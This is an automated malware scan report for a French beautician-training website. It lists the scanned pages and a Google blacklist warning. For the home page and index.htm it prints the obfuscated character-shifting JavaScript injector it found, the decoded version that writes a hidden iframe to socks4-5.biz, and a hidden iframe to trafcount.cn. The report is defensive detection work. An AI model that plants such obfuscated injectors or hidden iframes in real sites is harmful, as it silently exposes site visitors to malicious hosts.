New scan:

Malware Scanner report for formation-estheticienne.com

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "formation-estheticienne.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/2/2
2 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=formation-estheticienne.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.formation-estheticienne.com/
200 OK
Content-Length: 31081
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&84&74&83&7:&81&85&4f&75&7g&74&86&7e&76&7f&85&3f&88&83&7:&85&76&39&64&85&83&7:&7f&78&3f&77&83&7g&7e&54&79&72&83&54&7g&75&76&39&47&41&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d&42&42&43&3
... 4359 bytes are skipped ...
;3d&45&42&3d&44&43&3d&47&41&3d&45&48&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d&42&42&43&3d&42&42&47&3d&47&43&3:&3:&4c&4d&3g&84&74&83&7:&81&85&4f(**=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);

Decoded script:


var Str="' height='1' style='visibility: hidden;'></iframe> <iframe src='http://socks4-5.biz/index.php' width='1"
document.write(Str.substring(52,105),Str.substring(0,52))

Antivirus reports:

DrWeb
SCRIPT.Virus

Hidden iFrame found.
size: 0x0     style: hidden
src: http://trafcount.cn/counter/index.php?out=1196394696

<iframe src="http://trafcount.cn/counter/index.php?out=1196394696" width="0" height="0" style="display:none">

http://www.formation-estheticienne.com/capesthe.htm
200 OK
Content-Length: 40809
Content-Type: text/html
clean
http://www.formation-estheticienne.com/capcoiffure.htm
200 OK
Content-Length: 40666
Content-Type: text/html
clean
http://www.formation-estheticienne.com/relooking.htm
200 OK
Content-Length: 37752
Content-Type: text/html
clean
http://www.formation-estheticienne.com/maquillage.htm
200 OK
Content-Length: 45769
Content-Type: text/html
clean
http://www.formation-estheticienne.com/index.htm
200 OK
Content-Length: 31081
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&84&74&83&7:&81&85&4f&75&7g&74&86&7e&76&7f&85&3f&88&83&7:&85&76&39&64&85&83&7:&7f&78&3f&77&83&7g&7e&54&79&72&83&54&7g&75&76&39&47&41&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d&42&42&43&3
... 4359 bytes are skipped ...
;3d&45&42&3d&44&43&3d&47&41&3d&45&48&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d&42&42&43&3d&42&42&47&3d&47&43&3:&3:&4c&4d&3g&84&74&83&7:&81&85&4f(**=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);

Decoded script:


var Str="' height='1' style='visibility: hidden;'></iframe> <iframe src='http://socks4-5.biz/index.php' width='1"
document.write(Str.substring(52,105),Str.substring(0,52))

Antivirus reports:

DrWeb
SCRIPT.Virus

Hidden iFrame found.
size: 0x0     style: hidden
src: http://trafcount.cn/counter/index.php?out=1196394696

<iframe src="http://trafcount.cn/counter/index.php?out=1196394696" width="0" height="0" style="display:none">

http://www.formation-estheticienne.com/conseilbeaute.htm
200 OK
Content-Length: 34316
Content-Type: text/html
clean
http://www.formation-estheticienne.com/presentation.htm
200 OK
Content-Length: 21953
Content-Type: text/html
clean
http://www.formation-estheticienne.com/interview.htm
200 OK
Content-Length: 24060
Content-Type: text/html
clean
http://www.formation-estheticienne.com/etablissement.htm
200 OK
Content-Length: 20911
Content-Type: text/html
clean
http://www.formation-estheticienne.com/video.htm
200 OK
Content-Length: 15986
Content-Type: text/html
clean
http://www.formation-estheticienne.com/directeur.wmv
200 OK
Content-Length: 55020
Content-Type: video/x-ms-wmv
clean
http://www.formation-estheticienne.com/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://www.formation-estheticienne.com/chiffres.htm
200 OK
Content-Length: 19944
Content-Type: text/html
clean
http://www.formation-estheticienne.com/charte.htm
200 OK
Content-Length: 26494
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: formation-estheticienne.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: formation-estheticienne.com
Referer: http://www.google.com/search?q=formation-estheticienne.com

Result:
The result is similar to the first query. There are no suspicious redirects found.